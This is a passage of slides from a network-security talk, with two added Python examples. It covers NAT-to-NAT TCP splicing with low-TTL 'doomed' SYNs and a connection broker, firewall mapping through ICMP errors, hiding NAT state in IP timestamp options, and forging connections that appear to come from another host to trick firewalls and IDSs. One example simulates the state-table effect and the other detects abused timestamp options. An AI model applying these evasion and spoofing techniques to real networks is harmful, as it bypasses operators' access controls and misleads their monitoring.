to-end integrity
If IP_SRC == RFC1918 IP, packets will be NATted
normally
If IP_SRC == Yahoo/Microsoft/Whatever, packets
will be NATted a little less normally
Multiple hosts can share the same IP address, if
29. Pizza Protocol A La Mode
“Anyone order a pizza?”
Stateless approach: Ask everybody, drop
RST|ACK, forward everything else.
Just broadcast to the IP
Actually works behind NATs, but you need to
catalog all the local IPs
Drop all RSTs, pass all streams/ACKs
Breaks down when two people are listening on the
same port
Can split port range (1022, 2022, 3022, etc. all being
different instances of 22/ssh)
Apply host-level heuristics – priority for incoming
selection based on outgoing sessions
30. Incoming State
Stateful Approach (“you ordered the last one”)
Ask everyone, but remember who’s hosting
Send to the first host that replies
Increment the timer every time a packet is emitted
from the serving host for that port
If no packets are emitted after a certain amount of
time, allow open registration once more
“It’s amazing what you can do once security
is not an issue.”
31. TCP Splicing
NAT Deadlock Resolution
“Is it possible to establish a TCP connection
between two hosts, both behind NATs?”
Answer: Yes…but it ain’t pretty.
Convince each firewall that the other accepted the
connection
Layers will need to be played against each other to
prevent certain otherwise desirable messaging behaviors
from going too far
32. An Analogy
Bill Gates ‘n Larry Ellison
Why? They can call anyone they want –
their secretaries won’t stop ‘em.
None of us can call them – their
secretaries will stop us.
If Bill or Larry did call us, they’d actually be
able to hear us reply.
Asymmetry is in the initiation
33. Setting Up
Alice and Bob both behind NATting
firewalls
Firewalls authorize all outgoing sessions,
block all incoming sessions
Block w/ state – no faking
Only accept fully validated responses to
outgoing messages
Ports must match
SEQ#’s must match
Total outgoing trust, zero incoming trust
34. The Attempt
Alice tries to send a message to Bob
SYN hits Alice’s firewall, is given global IP + entry
in state table “connection attempted”
SYN travels across Internet
SYN hits Bob’s firewall, RST|ACK sent
RST|ACK hits Alice’s firewall, entry in state table
torn down, RST|ACK readdressed to Alice
Alice gets nowhere
Bob does the same thing
35. Analysis
Good
Entry in firewall state table, awaiting a reply
Bad
Negative reply, entry in state table
destroyed
Can we get the former without the
latter?
36. Doomed TTLs
Packet first hits local firewall, gets NAT entry,
travels across Internet, hits remote firewall,
gets shot down.
Good stuff closer to us, bad stuff farther away
TTL: Time To Live – SET TO ~4
Maximum number of hops packet is allowed to
travel along the network before being dropped
Used by IP to prevent routing loops
Used by us to prevent state table from closing the
hole
Alice SYNs w/ Doomed TTL
Bob SYNs w/ Doomed TTL
Both firewalls have a hole open for each other
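An added simulation (mine, not from the talk) of the state-table reasoning in slides 33 to 36, in Python: a minimal NATting firewall opens an entry on an outgoing SYN, answers an unsolicited SYN with RST|ACK, and tears an entry down when a matching RST|ACK comes back. Running Alice's SYN once with a normal TTL and once with a doomed TTL of 4 across three modelled internet hops shows the difference the slide describes. The addresses, the port-preserving translation and the hop count are assumptions of the model, and the ICMP Time Exceeded that a real router would send is not modelled.

```python
from dataclasses import dataclass, replace


@dataclass
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: str
    ttl: int


class StatefulNat:
    """Minimal NATting firewall of the kind slide 33 describes: every
    outgoing SYN opens a state-table entry, only traffic matching an entry
    is let back in, and a RST|ACK matching an entry destroys it."""

    def __init__(self, name: str, public_ip: str):
        self.name = name
        self.public_ip = public_ip
        # (remote ip, remote port, public port) -> (inside ip, inside port).
        # Port-preserving mapping: the "best effort to match" case of slide 26.
        self.table = {}

    def outbound(self, pkt: Packet):
        key = (pkt.dst, pkt.dport, pkt.sport)
        if "SYN" in pkt.flags and "ACK" not in pkt.flags:
            self.table[key] = (pkt.src, pkt.sport)   # "connection attempted"
        if key not in self.table:
            return None                              # no session: dropped
        return replace(pkt, src=self.public_ip, ttl=pkt.ttl - 1)

    def inbound(self, pkt: Packet):
        """Returns ("forward", pkt), ("reject", rst_ack) or ("drop", None)."""
        key = (pkt.src, pkt.sport, pkt.dport)
        entry = self.table.get(key)
        if entry is None:
            if pkt.flags == "SYN":                   # slide 34: RST|ACK sent
                rst = Packet(self.public_ip, pkt.dport, pkt.src, pkt.sport, "RST|ACK", 64)
                return ("reject", rst)
            return ("drop", None)                    # other unsolicited traffic
        if "RST" in pkt.flags:
            del self.table[key]                      # slide 35: entry destroyed
        inside_ip, inside_port = entry
        return ("forward", replace(pkt, dst=inside_ip, dport=inside_port, ttl=pkt.ttl - 1))


def transit(pkt, hops: int):
    """The Internet between the firewalls: each router decrements TTL and
    discards the packet once it reaches zero."""
    if pkt is None or pkt.ttl - hops < 1:
        return None
    return replace(pkt, ttl=pkt.ttl - hops)


def attempt(ttl: int, internet_hops: int = 3) -> dict:
    """Alice (behind fw_a) SYNs Bob's firewall with the given TTL; report
    whether the SYN got there and whether fw_a's entry is still open."""
    fw_a = StatefulNat("A", "198.51.100.1")   # constructed addresses
    fw_b = StatefulNat("B", "203.0.113.1")
    syn = Packet("10.0.0.5", 5000, fw_b.public_ip, 5000, "SYN", ttl)

    out = fw_a.outbound(syn)
    key = (fw_b.public_ip, 5000, 5000)
    arrived = transit(out, internet_hops)
    reached_remote = arrived is not None
    if reached_remote:
        verdict, reply = fw_b.inbound(arrived)       # no state at B: RST|ACK
        if verdict == "reject":
            back = transit(reply, internet_hops)
            if back is not None:
                fw_a.inbound(back)                   # matches A's entry: torn down
    return {"reached_remote": reached_remote, "entry_survives": key in fw_a.table}


if __name__ == "__main__":
    print("normal TTL:", attempt(64))
    print("doomed TTL:", attempt(4))
```

For an operator the relevant property shows in the second run: an entry created by an outgoing SYN that never receives a reply lives until the firewall's idle timeout fires, so the half-open timeout, not the reply path, is what bounds how long such a hole stays open.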
37. Packets, Ports, Problems
Three way handshake – SYN, SYN|ACK,
ACK
Outgoing connections have SYNs and ACKs but
no SYN|ACKs
Ports
Need to agree on which ports are linking up
Need to discover firewall multiplexing rules
Timing
Need to know when to attempt connection
Solution to all three: Handshake Only
Connection Broker
Involved only in setting up connection
38. The Other Shoe Drops
Now you add a connection broker
HANDSHAKE ONLY.
Sends the SYN|ACK Host/Port/SEQ#
combination “virtually added” to firewall
packet acceptance rules
Larry Ellison: “Bill Gates is going to call here in
the next two minutes, please put his call through.”
Need to generate packets, though
39. Local Port Strategies
Some firewalls do best effort to match
Some increment from a fixed counter
Some use random local ports
Entropy cannot be differentiated – rule
from kleptography
As long as it’s translated back…
Need to discover what strategy is being
used
40. Full Broker Discovery
Alice and Bob SYN Charlie 2x
Charlie NFO Alice and Bob
Alice and Bob SYN Charlie
Alice and Bob DoomSYN Bob and Alice
Alice and Bob SYN Charlie
Charlie SYN|ACK Alice and Bob
Throw details about port selection in IPID
Alice and Bob DoomACK Bob and Alice
Alice and Bob begin normal TCP session to
each other, as if the other acknowledged
correctly
41. Much easier strategies
Source route through connection broker, drop
the route once the connection goes live
UDP NAT2NAT
Works all over the place in games
UDP is symmetrical – just spew packets at
each other with opposite local port / source port,
and eventually the state system will assume the
other’s outgoing packet is a response to its own
outgoing packet
You can run TCP over UDP
Far less fun though
42. TTL-Based Firewall Analysis
Emit a SYN with a low TTL
SYN spawns ICMP error, hits local
firewall, which rewrites IP header and
forwards to local host
Firewall doesn’t rewrite ICMP data
Original outgoing header
Can discover how firewall is munging
our datastream
43. State of Disarray
State Management
State = Buffers
Buffers need to be searched
Buffers need to be allocated
Buffers need to be overflown
If your name is Gobbles
NAT normally needs to be stateful
A packet comes in, and given the Source IP, the
Source Port, and the Destination Port, we check
our tables to rewrite on the internal interface the
Destination IP (not firewall) and maybe the
destination port too
The MAC address is always rewritten, but with MAT we
44. Stateless NAT: Possible?
State is all about things we have to remember
Stateless scanning is about extracting what we
need from what we get back
“Can we embed the NAT state in every
outgoing IP packet such that every response
received will contain the full NAT state”?
Answer: Yup. (Thanks, Spence.)
IP Timestamps Mode 3
IP Option against each host along the route. Up to four 4
byte IP addresses are specified, with space for up to four
4 byte timestamps to be added
If IP in the timestamp request matches IP of the router,
the router replaces the timestamp with its own
If IP doesn’t match, pass along the timestamps of others
45. Abusing IP Timestamps
Insert timestamps from invalid IPs containing
not actual timestamps but NAT state
Encrypt NAT state so it may not be modified
en route
Decrypt NAT state upon packet return
Problems
Need to insert IP options – may overflow packet,
may need to fragment, etc.
IP options are sometimes blocked by firewalls
Damn source routers ;-)
Possibilities with TCP Timestamps too
Reply field contains 32 bits of user specified stamp
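Seen from the firewall or IDS side, the abuse slide 45 describes leaves a trace in the option bytes themselves. This added example (mine, not part of the talk) parses the RFC 791 timestamp option in prespecified-address mode (flag 3, the "Mode 3" of slide 44) and applies two checks: a registered stamp with the high bit clear must be a valid milliseconds-since-midnight value, which is RFC 791's own definition of the field, and a slot the pointer has not yet reached should still be empty, which is a heuristic of mine rather than an RFC rule. The sample options area, its addresses and its stamp values are constructed.

```python
import ipaddress
import struct

IPOPT_EOL, IPOPT_NOP, IPOPT_TIMESTAMP = 0, 1, 68
FLAG_PRESPECIFIED = 3
MS_PER_DAY = 24 * 60 * 60 * 1000   # RFC 791 stamps are ms since midnight UT


def build_timestamp_option(slots, registered, flag=FLAG_PRESPECIFIED) -> bytes:
    """Build a type-68 option with prespecified addresses (flag 3).
    slots: list of (dotted ip, 32-bit stamp); the first `registered` slots
    count as already written by routers, so the pointer sits after them."""
    body = b"".join(ipaddress.ip_address(ip).packed + struct.pack("!I", st)
                    for ip, st in slots)
    length = 4 + len(body)
    if length > 40:
        raise ValueError("IPv4 options area is at most 40 bytes")
    pointer = 5 + 8 * registered            # 1-based offset of next free slot
    return bytes([IPOPT_TIMESTAMP, length, pointer, flag & 0x0F]) + body


def parse_timestamp_entries(options: bytes):
    """Walk an IPv4 options area and return every (addr, stamp) slot of each
    flag-3 timestamp option, noting whether the pointer has passed it."""
    entries = []
    i = 0
    while i < len(options):
        kind = options[i]
        if kind == IPOPT_EOL:
            break
        if kind == IPOPT_NOP:
            i += 1
            continue
        if i + 1 >= len(options) or options[i + 1] < 2 or i + options[i + 1] > len(options):
            raise ValueError("malformed option at offset %d" % i)
        length = options[i + 1]
        if kind == IPOPT_TIMESTAMP and (options[i + 3] & 0x0F) == FLAG_PRESPECIFIED:
            pointer = options[i + 2]
            data = options[i + 4:i + length]
            for off in range(0, len(data) - 7, 8):
                addr, stamp = struct.unpack("!4sI", data[off:off + 8])
                entries.append({"addr": str(ipaddress.ip_address(addr)),
                                "stamp": stamp,
                                "registered": off + 8 <= pointer - 5})
        i += length
    return entries


def suspicious_slots(entries):
    """Two checks. The first is RFC 791's definition of a standard stamp
    (high bit clear means ms since midnight, so it must be below a day);
    the second is an assumption: an unreached slot should still be zero."""
    findings = []
    for e in entries:
        if e["registered"]:
            if not (e["stamp"] & 0x80000000) and e["stamp"] >= MS_PER_DAY:
                findings.append((e["addr"], "stamp is not a valid ms-since-midnight value"))
        elif e["stamp"] != 0:
            findings.append((e["addr"], "unstamped slot already carries data"))
    return findings


# Constructed sample (addresses from documentation ranges): three routers
# have registered, the last slot has not been reached, yet carries data.
SAMPLE_OPTIONS = build_timestamp_option(
    [("192.0.2.1", 43_200_000),    # noon UT: fine
     ("192.0.2.2", 0x80001234),    # non-standard value, declared by its high bit: fine
     ("192.0.2.3", 0x7ABCDEF0),    # high bit clear but far more than a day of ms
     ("203.0.113.9", 0x13572468)], # not yet reached by the pointer, should be zero
    registered=3,
) + bytes([IPOPT_EOL]) + b"\x00" * 3   # pad the options area to 40 bytes


def audit(options: bytes = SAMPLE_OPTIONS):
    return suspicious_slots(parse_timestamp_entries(options))


if __name__ == "__main__":
    for addr, reason in audit():
        print(f"{addr}: {reason}")
```

Only flag 3 is parsed; flags 0 and 1 and the overflow nibble are skipped. Where the perimeter simply drops packets carrying IP options, as the slide notes many firewalls do, this check never needs to run; it is for the places that still let options through.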
46. Tricking Firewalls/IDSs
Alice can forge a connection from an arbitrary
IP by cooperating with Charlie
Alice looks like she’s connecting to Yahoo, but is
informing Charlie of the specifics of the connection
attempt
Charlie replies as if he was Yahoo, and begins a
TCP stream of arbitrary data to Alice from “Yahoo”
Alice acknowledges all data to “Yahoo” with the
doomed TTL – we continue low TTL count through
the data stream
Really messy in terms of ICMP time
exceeded messages, BUT logging systems
might drop these messages